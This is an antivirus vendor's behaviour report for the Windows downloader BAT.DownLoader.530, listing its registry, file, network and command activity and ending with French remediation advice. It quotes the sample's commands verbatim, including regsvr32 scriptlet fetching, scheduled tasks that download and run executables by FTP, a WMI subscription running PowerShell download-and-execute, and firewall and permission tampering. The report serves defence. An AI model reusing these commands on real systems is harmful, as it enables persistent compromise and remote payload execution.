Bibliothèque
Ma bibliothèque

+ Ajouter à la bibliothèque

Contacter-nous !
Support 24/24 | Rules regarding submitting

Nous téléphoner

0 825 300 230

Forum

Vos requêtes

  • Toutes : -
  • Non clôturées : -
  • Dernière : le -

Nous téléphoner

0 825 300 230

Profil

BAT.DownLoader.530

Added to the Dr.Web virus database: 2020-02-28

Virus description added:

Technical Information

To ensure autorun and distribution
Modifies the following registry keys
  • [<HKLM>\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run] 'start' = 'regsvr32 /u /s /i:http://js.mys2016.info:280/v1.sct scrobj.dll'
Creates or modifies the following files
  • <SYSTEM32>\tasks\mysa
  • <SYSTEM32>\tasks\mysa2
Creates the following services
  • [<HKLM>\System\CurrentControlSet\Services\MpsSvc] 'Start' = '00000002'
  • [<HKLM>\System\CurrentControlSet\Services\PolicyAgent] 'Start' = '00000002'
Malicious functions
Executes the following
  • '%WINDIR%\syswow64\net.exe' stop AnyDesk
  • '%WINDIR%\syswow64\net.exe' stop xWinWpdSrv
  • '%WINDIR%\syswow64\net.exe' stop Windows Audio Control
  • '%WINDIR%\syswow64\taskkill.exe' /f /im help.exe /im doc001.exe /im dhelllllper.exe /im DOC001.exe /im dhelper.exe /im conime.exe /im docv8.exe /im king.exe /im name.exe /im doc.exe /im wodCmdTerm.exe /im win1ogins.exe /im wi...
  • '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow
  • '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="deny tcp 445" dir=in protocol=tcp localport=445 action=block
  • '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="deny tcp 139" dir=in protocol=tcp localport=139 action=block
  • '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="tcpall" dir=out protocol=tcp localport=0-65535 action=allow
Downloads
  • http://ru##good.ru/batpower.txt
Modifies file system
Creates the following files
  • %TEMP%\c3.bat
  • %TEMP%\excludes
  • %TEMP%\n.vbs
Deletes the following files
  • %TEMP%\n.vbs
Network activity
TCP
HTTP GET requests
  • http://ru##good.ru/batpower.txt
  • http://ru##good.ru/kill.txt
  • http://ru##good.ru/uninstall.txt
  • http://ru##good.ru/wmi.txt
UDP
  • DNS ASK ru##good.ru
Miscellaneous
Searches for the following windows
  • ClassName: 'EDIT' WindowName: ''
  • ClassName: '' WindowName: ''
Creates and executes the following
  • '%WINDIR%\syswow64\wscript.exe' "%TEMP%\n.vbs"
  • '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\c3.bat" "' (with hidden window)
Executes the following
  • '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\c3.bat" "
  • '%WINDIR%\syswow64\wbem\wmic.exe' process where "name='taskhost.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\taskhost.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\taskhost.exe'" delete
  • '%WINDIR%\syswow64\wbem\wmic.exe' datafile where "Name='c:\\windows\\debug\\lsmos.exe'" get Version /value
  • '%WINDIR%\syswow64\findstr.exe' "=1\.0\.0\.1$"
  • '%WINDIR%\syswow64\cmd.exe' /c wmic process where "ExecutablePath='c:\\windows\\debug\\lsmos.exe'" get ProcessId|findstr "[0-9]"
  • '%WINDIR%\syswow64\wbem\wmic.exe' process where "ExecutablePath='c:\\windows\\debug\\lsmos.exe'" get ProcessId
  • '%WINDIR%\syswow64\findstr.exe' "[0-9]"
  • '%WINDIR%\syswow64\schtasks.exe' /Delete /TN "Mysa3" /F
  • '%WINDIR%\syswow64\schtasks.exe' /Delete /TN "ok" /F
  • '%WINDIR%\syswow64\schtasks.exe' /Delete /TN "Mysa1" /F
  • '%WINDIR%\syswow64\schtasks.exe' /Delete /TN "WindowsUpdate1" /F
  • '%WINDIR%\syswow64\schtasks.exe' /Delete /TN "WindowsUpdate3" /F
  • '%WINDIR%\syswow64\schtasks.exe' /Delete /TN "Windows_Update" /F
  • '%WINDIR%\syswow64\schtasks.exe' /Delete /TN "Update" /F
  • '%WINDIR%\syswow64\schtasks.exe' /Delete /TN "Update2" /F
  • '%WINDIR%\syswow64\schtasks.exe' /Delete /TN "Update4" /F
  • '%WINDIR%\syswow64\schtasks.exe' /Delete /TN "Update3" /F
  • '%WINDIR%\syswow64\schtasks.exe' /Delete /TN "windowsinit" /F
  • '%WINDIR%\syswow64\schtasks.exe' /Delete /TN "System Security Check" /F
  • '%WINDIR%\syswow64\schtasks.exe' /Delete /TN "AdobeFlashPlayer" /F
  • '%WINDIR%\syswow64\schtasks.exe' /Delete /TN "updat_windows" /F
  • '%WINDIR%\syswow64\schtasks.exe' /Delete /TN "at1" /F
  • '%WINDIR%\syswow64\schtasks.exe' /Delete /TN "my1" /F
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /TN "\Microsoft\Windows\UPnP\Services" /F
  • '%WINDIR%\syswow64\sc.exe' delete Windows Audio Control
  • '%WINDIR%\syswow64\sc.exe' delete Windows_Audio_Control
  • '%WINDIR%\syswow64\wbem\wmic.exe' process where "name='services.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\services.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\services.exe'" delete
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\Public\Music\*.exe /e /d everyone
  • '%WINDIR%\syswow64\wbem\wmic.exe' process where "name='WUDFHosts.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\WUDFHosts.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\WUDFHosts.exe'" delete
  • '%WINDIR%\syswow64\wbem\wmic.exe' process where "name='wininit.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\wininit.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\wininit.exe'" delete
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Help\lsass.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\temp\*.dll /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\debug\Nat\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Registration\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %APPDATA%\Tempo\*.exe /e /d everyone
  • '%WINDIR%\syswow64\cacls.exe' "%ProgramFiles(x86)%\Microsoft Blliasc\*.*" /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\system\lsaus.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' "%PROGRAMDATA%\clr_optimization_v4.0.30318_64\*.exe" /e /d system
  • '%WINDIR%\syswow64\cacls.exe' "%PROGRAMDATA%\Microsoft\clr_optimization_v4.0.30318_64\*.exe" /e /d system
  • '%WINDIR%\syswow64\cacls.exe' "%PROGRAMDATA%\CodeGear\Microsoft Office\DataFiles\Windows\Config\Microsoft\Images\Bugger\*.exe" /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %PROGRAMDATA%\Microsoft\HelpLibrary\*.dll /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\WBEM\ccproxy\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %PROGRAMDATA%\Microsoft\Network\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\mysql.log /e /d system
  • '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i:http://js.###2016.info:280/v1.sct scrobj.dll" /f
  • '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i:http://js.###2016.info:280/v1.sct scrobj.dll" /f
  • '%WINDIR%\syswow64\reg.exe' delete HKlm\Software\Microsoft\Windows\CurrentVersion\Run /v "start1" /f
  • '%WINDIR%\syswow64\cmd.exe' /S /D /c" echo y"
  • '%WINDIR%\syswow64\cmd.exe' /S /D /c" rd /s /q %WINDIR%\help\lsmosee.exe"
  • '%WINDIR%\syswow64\cmd.exe' /S /D /c" rd /s /q %WINDIR%\debug\lsmosee.exe"
  • '%WINDIR%\syswow64\net.exe' start MSSQLSERVER
  • '%WINDIR%\syswow64\net1.exe' start MSSQLSERVER
  • '%WINDIR%\syswow64\schtasks.exe' /create /tn "Mysa" /tr "cmd /c echo open ftp.ftp0930.host>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a1.exe %WINDIR%\update.exe>>s&echo bye>>s&ftp -s:s&%WINDIR%\update.exe" /ru "system...
  • '%WINDIR%\syswow64\schtasks.exe' /create /tn "Mysa2" /tr "cmd /c echo open ftp.ftp0930.host>ps&echo test>>ps&echo 1433>>ps&echo get s1.rar %WINDIR%\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&%WINDIR%\help\lsmosee.exe" /ru "sy...
  • '%WINDIR%\syswow64\wbem\wmic.exe' process where "name='svchost.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\svchost.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\svchost.exe'" delete
  • '%WINDIR%\syswow64\wbem\wmic.exe' process where "name='csrss.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\csrss.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\csrss.exe'" delete
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\Public\Music\*.vbs /e /d system
  • '%WINDIR%\syswow64\sc.exe' delete xWinWpdSrv
  • '%WINDIR%\syswow64\netsh.exe' ipsec static delete filteraction name=allow
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="fuckayoumm3" DELETE
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm4" DELETE
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="fuckyoumm4" DELETE
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='fuckyoumm3'" DELETE
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="fuckamm3" DELETE
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="fuckamm4" DELETE
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='fuckamm3'" DELETE
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="coronav", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE T...
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="coronav2", CommandLineTemplate="cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://ru...
  • '%WINDIR%\syswow64\cmd.exe' /c start wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"coronav\"", Consumer="CommandLineEventConsumer.Name=\"coronav2\""
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"coronav\"", Consumer="CommandLineEventConsumer.Name=\"coronav2\""
  • '%WINDIR%\syswow64\cacls.exe' "%ProgramFiles%\Microsoft Updates" /e /d system
  • '%WINDIR%\syswow64\cmd.exe' /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://ru##good.ru/batpower.txt')
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:\\root\subscription PATH ActiveScriptEventConsumer WHERE Name=fuckyoumm2_consumer DELETE
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:\\root\subscription PATH __EventFilter WHERE "Name=Windows Events Filter" DELETE
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:\\root\subscription PATH ActiveScriptEventConsumer WHERE "Name=Windows Events Consumer4" DELETE
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:\\root\subscription PATH CommandLineEventConsumer WHERE "Name=Windows Events Consumer" DELETE
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:\\root\subscription PATH __FilterToConsumerBinding WHERE "Filter=__EventFilter.Name='Windows Events Filter'" DELETE
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:\\root\subscription PATH __EventFilter WHERE Name=fuckayoumm3 DELETE
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:\\root\subscription PATH ActiveScriptEventConsumer WHERE Name=fuckyoumm4 DELETE
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:\\root\subscription PATH CommandLineEventConsumer WHERE Name=fuckyoumm4 DELETE
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:\\root\subscription PATH __FilterToConsumerBinding WHERE Filter=__EventFilter.Name='fuckyoumm3' DELETE
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:\\root\subscription PATH __EventFilter WHERE Name=fuckamm3 DELETE
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:\\root\subscription PATH CommandLineEventConsumer WHERE Name=fuckamm4 DELETE
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="Windows Events Consumer" DELETE
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='Windows Events Filter'" DELETE
  • '%WINDIR%\syswow64\netsh.exe' ipsec static delete filterlist name=Allowlist
  • '%WINDIR%\syswow64\netsh.exe' ipsec static delete policy name=win
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm2_consumer" DELETE
  • '%WINDIR%\syswow64\netsh.exe' advfirewall firewall delete rule name="tcp all" dir=in
  • '%WINDIR%\syswow64\netsh.exe' advfirewall firewall delete rule name="deny tcp 445" dir=in
  • '%WINDIR%\syswow64\netsh.exe' advfirewall firewall delete rule name="deny tcp 139" dir=in
  • '%WINDIR%\syswow64\netsh.exe' advfirewall firewall delete rule name="tcpall" dir=out
  • '%WINDIR%\syswow64\sc.exe' config MpsSvc start= auto
  • '%WINDIR%\syswow64\net.exe' start MpsSvc
  • '%WINDIR%\syswow64\net1.exe' start MpsSvc
  • '%WINDIR%\syswow64\netsh.exe' advfirewall set allprofiles state on
  • '%WINDIR%\syswow64\netsh.exe' ipsec static add policy name=win
  • '%WINDIR%\syswow64\netsh.exe' ipsec static add filterlist name=Allowlist
  • '%WINDIR%\syswow64\netsh.exe' ipsec static add filterlist name=denylist
  • '%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
  • '%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
  • '%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
  • '%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
  • '%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
  • '%WINDIR%\syswow64\netsh.exe' ipsec static add filteraction name=Allow action=permit
  • '%WINDIR%\syswow64\netsh.exe' ipsec static add filteraction name=deny action=block
  • '%WINDIR%\syswow64\netsh.exe' ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny
  • '%WINDIR%\syswow64\netsh.exe' ipsec static set policy name=win assign=y
  • '%WINDIR%\syswow64\cmd.exe' /S /D /c" ver "
  • '%WINDIR%\syswow64\find.exe' "5.1."
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="fuckyoumm2_filter" DELETE
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="Windows Events Filter" DELETE
  • '%WINDIR%\syswow64\netsh.exe' ipsec static delete filterlist name=denylist
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="Windows Events Consumer4" DELETE
  • '%WINDIR%\syswow64\cacls.exe' %PROGRAMDATA%\Temp\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Fonts\Windows\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\temp\svchost.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' "%ProgramFiles(x86)%\autodesk\*.exe" /e /d everyone
  • '%WINDIR%\syswow64\cacls.exe' "%ProgramFiles(x86)%\autodesk\*.exe" /e /d system
  • '%WINDIR%\syswow64\cacls.exe' "%ProgramFiles(x86)%\anydesk\*.exe" /e /d system
  • '%WINDIR%\syswow64\cacls.exe' "%ProgramFiles(x86)%\anydesk\*.exe" /e /d everyone
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\debug\WIA\*.exe /e /d everyone
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\asp\AppData\Roaming\Tempo\*.exe /e /d everyone
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\administrator\AppData\Roaming\Tempo /e /d everyone
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\asp\AppData\Roaming\Tempo\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\Default\AppData\Roaming\Tempo\*.exe /e /d everyone
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\administrator\AppData\Roaming\Tempo /e /d system
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\Default\AppData\Roaming\Tempo /e /d system
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\Default\AppData\Roaming\Tempo /e /d everyone
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\Default\AppData\Roaming\Tempo\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\asp\AppData\Roaming\*.exe /e /g everyone:f
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\administrator\AppData\Roaming /e /g everyone:f
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\asp\AppData\Local\Temp /e /g system:f
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\asp\AppData\Local\Temp /e /g everyone:f
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\administrator\AppData\Local\Temp /e /g system:f
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\administrator\AppData\Local\Temp /e /g everyone:f
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\Default\AppData\Local\Temp /e /g everyone:f
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\Default\AppData\Roaming /e /g everyone:f
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\Default\AppData\Roaming /e /g system:f
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\Default\AppData\Local\Temp\*.exe /e /g everyone:f
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\Default\AppData\Roaming\*.exe /e /g everyone:f
  • '%WINDIR%\syswow64\cacls.exe' "%ProgramFiles(x86)%\Microsoft SQL Server\110\Shared\*.exe" /e /d everyone
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\Default\AppData\Roaming\*.exe /e /g system:f
  • '%WINDIR%\syswow64\cacls.exe' "%ProgramFiles(x86)%\RemoteDesk\*.exe" /e /d system
  • '%WINDIR%\syswow64\cacls.exe' "%ProgramFiles%\anyDesk\*.exe" /e /d system
  • '%WINDIR%\syswow64\net1.exe' user mm123$ /del
  • '%WINDIR%\syswow64\net1.exe' user admin$ /del
  • '%WINDIR%\syswow64\net1.exe' user sysadm05 /del
  • '%WINDIR%\syswow64\net1.exe' stop AnyDesk
  • '%WINDIR%\syswow64\sc.exe' config AnyDesk start= disabled
  • '%WINDIR%\syswow64\net1.exe' stop xWinWpdSrv
  • '%WINDIR%\syswow64\sc.exe' config xWinWpdSrv start= disabled
  • '%WINDIR%\syswow64\net1.exe' stop Windows Audio Control
  • '%WINDIR%\syswow64\sc.exe' config Windows Audio Control start= disabled
  • '%WINDIR%\syswow64\attrib.exe' -s -h -r C:\Users\Default\AppData\Local\Temp\*.exe
  • '%WINDIR%\syswow64\attrib.exe' -s -h -r C:\Users\Default\AppData\Roaming\Tempo\*.exe
  • '%WINDIR%\syswow64\attrib.exe' -s -h -r C:\Users\Default\AppData\Roaming\*.exe
  • '%WINDIR%\syswow64\attrib.exe' -s -h -r C:\Users\asp\AppData\Local\Temp\*.exe
  • '%WINDIR%\syswow64\attrib.exe' -s -h -r C:\Users\asp\AppData\Roaming\Tempo\*.exe
  • '%WINDIR%\syswow64\attrib.exe' -s -h -r C:\Users\asp\AppData\Roaming\*.exe
  • '%WINDIR%\syswow64\attrib.exe' -s -h -r C:\Users\administrator\AppData\Local\Temp\*.exe
  • '%WINDIR%\syswow64\attrib.exe' -s -h -r C:\Users\administrator\AppData\Roaming\Tempo\*.exe
  • '%WINDIR%\syswow64\attrib.exe' -s -h -r C:\Users\administrator\AppData\Roaming\*.exe
  • '%WINDIR%\syswow64\cacls.exe' "%ProgramFiles%\RemoteDesk\*.exe" /e /d everyone
  • '%WINDIR%\syswow64\cacls.exe' "%ProgramFiles%\RemoteDesk\*.exe" /e /d system
  • '%WINDIR%\syswow64\cacls.exe' "%ProgramFiles%\Microsoft SQL Server\110\Shared\*.exe" /e /d everyone
  • '%WINDIR%\syswow64\cacls.exe' "%ProgramFiles%\Microsoft SQL Server\110\Shared\*.exe" /e /d system
  • '%WINDIR%\syswow64\cacls.exe' "%ProgramFiles%\autodesk\*.exe" /e /d everyone
  • '%WINDIR%\syswow64\cacls.exe' "%ProgramFiles%\autodesk\*.exe" /e /d system
  • '%WINDIR%\syswow64\cacls.exe' "%ProgramFiles%\anyDesk\*.exe" /e /d everyone
  • '%WINDIR%\syswow64\cacls.exe' "%ProgramFiles(x86)%\RemoteDesk\*.exe" /e /d everyone
  • '%WINDIR%\syswow64\cacls.exe' C:\SysData\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' "%ProgramFiles(x86)%\Microsoft SQL Server\110\Shared\*.exe" /e /d system
  • '%WINDIR%\syswow64\cacls.exe' C:\Msupdate /e /d system
  • '%WINDIR%\syswow64\cacls.exe' "%WINDIR%\fonts\*.exe" /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\security\IIS\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %CommonProgramFiles%\System\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %ProgramFiles%\dll\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %CommonProgramFiles%\Services\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %CommonProgramFiles%\SpeechEngines\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Fonts\system32\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\SpeechsTracing\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' "%ProgramFiles(x86)%\Microsoft SvidiaTen\*.exe" /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %CommonProgramFiles%\Microsoft Shared\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' C:\System\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\1\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' c:\users\public\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' "%CommonProgramFiles%\conime.exe" /e /d system
  • '%WINDIR%\syswow64\cacls.exe' "%CommonProgramFiles(x86)%\conime.exe" /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %ProgramFiles%\test\*.exe /e /d everyone
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Fonts\help\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\web\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' "%ProgramFiles%\SQLWriter$\*.exe" /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Prefetch\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %PROGRAMDATA%\WmiAppSvr\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Fonts\Mysql\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\drivers\taskmgr.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\drivers\svchost.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' "%WINDIR%\Temp\32p.zip ВЄ╠?ВїГіВї┤Вї║Г­└???? 1\*.*" /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\fonts\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\taskmgrs.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Fonts\Microsoft /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\fonts\system32\svchost.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\xcecg /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\smss.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' "%CommonProgramFiles%\Services\*.exe" /e /d system
  • '%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\a.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\security\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\security\*.exe /e /d everyone
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Resources\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Resources\*.exe /e /d everyone
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Resources\Themes\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Resources\Themes\*.exe /e /d everyone
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\system\lsmsm.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %PROGRAMDATA%\homegroup\*.exe /e /d system
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:\\root\subscription PATH __FilterToConsumerBinding WHERE Filter=__EventFilter.Name='fuckamm3' DELETE
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:\\root\subscription PATH __EventFilter WHERE Name=fuckyoumm2_filter DELETE
  • '%WINDIR%\syswow64\cacls.exe' %PROGRAMDATA%\diskdata\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\servwdrv.dll /e /d everyone
  • '%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\servwdrvx.dll /e /d system
  • '%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\servwdrvx.dll /e /d everyone
  • '%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\serwwdrv.dll /e /d system
  • '%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\serwwdrv.dll /e /d everyone
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\svchost.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %PROGRAMDATA%\WmiAppSrv\svchost.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Help\taskhost.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Web\wininit.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %PROGRAMDATA%\Microsoft\WmiAppSvr\csrss.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %CommonProgramFiles%\svshpst.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\ccm /e /d system
  • '%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\servwdrv.dll /e /d system
  • '%WINDIR%\syswow64\wbem\wmic.exe' os get caption

Recommandations pour le traitement

  1. Si le système d'exploitation peut être démarré (en mode normal ou en mode sans échec), téléchargez Dr.Web Security Space et lancez un scan complet de votre ordinateur et de tous les supports amovibles que vous utilisez. En savoir plus sur Dr.Web Security Space.
  2. Si le démarrage du système d'exploitation est impossible, veuillez modifier les paramètres du BIOS de votre ordinateur pour démarrer votre ordinateur via CD/DVD ou clé USB. Téléchargez l'image du disque de secours de restauration du système Dr.Web® LiveDisk ou l'utilitaire pour enregistrer Dr.Web® LiveDisk sur une clé USB, puis préparez la clé USB appropriée. Démarrez l'ordinateur à l'aide de cette clé et lancez le scan complet et le traitement des menaces détectées.

Veuillez lancer le scan complet du système à l'aide de Dr.Web Antivirus pour Mac OS.

Veuillez lancer le scan complet de toutes les partitions du disque à l'aide de Dr.Web Antivirus pour Linux.

  1. Si votre appareil mobile fonctionne correctement, veuillez télécharger et installer sur votre appareil mobile Dr.Web pour Android. Lancez un scan complet et suivez les recommandations sur la neutralisation des menaces détectées.
